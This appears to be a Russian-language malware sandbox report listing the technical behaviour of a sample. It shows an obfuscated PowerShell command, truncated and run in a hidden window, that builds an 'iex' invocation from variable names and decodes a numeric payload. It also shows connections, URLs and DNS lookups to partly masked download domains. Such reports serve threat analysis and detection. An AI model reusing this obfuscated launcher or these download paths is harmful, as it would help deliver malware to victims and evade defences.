Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ((geT-vaRiaBlE '*MDr*').Name[3,11,2]-joIn'') (-JOIn ( '40A103q109H94&102H104x102x44<49E44r98u105A123q33q99A110&102x105&111q120x44q126x109H98q104u99k97E55A40q64<77k104A66u123r44q49q44A98E105<1...
- 'ic####workllc.com':80
- '17###.#17.justsv.com':80
- 'as###asda.org':80
- 'ge#####ovehealing.com':443
- http://www.ic####workllc.com/IN3mtJj/
- http://www.17###.#17.justsv.com/pUZdddm/
- http://www.as###asda.org/vv28IS9/
- 'ge#####ovehealing.com':443
- DNS ASK ic####workllc.com
- DNS ASK ho####mxaydung.com
- DNS ASK 17###.#17.justsv.com
- DNS ASK um###yqx.com
- DNS ASK as###asda.org
- DNS ASK ge#####ovehealing.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ((geT-vaRiaBlE '*MDr*').Name[3,11,2]-joIn'') (-JOIn ( '40A103q109H94&102H104x102x44<49E44r98u105A123q33q99A110&102x105&111q120x44q126x109H98q104u99k97E55A40q64<77k104A66u123r44q49q44A98E105<1...' (со скрытым окном)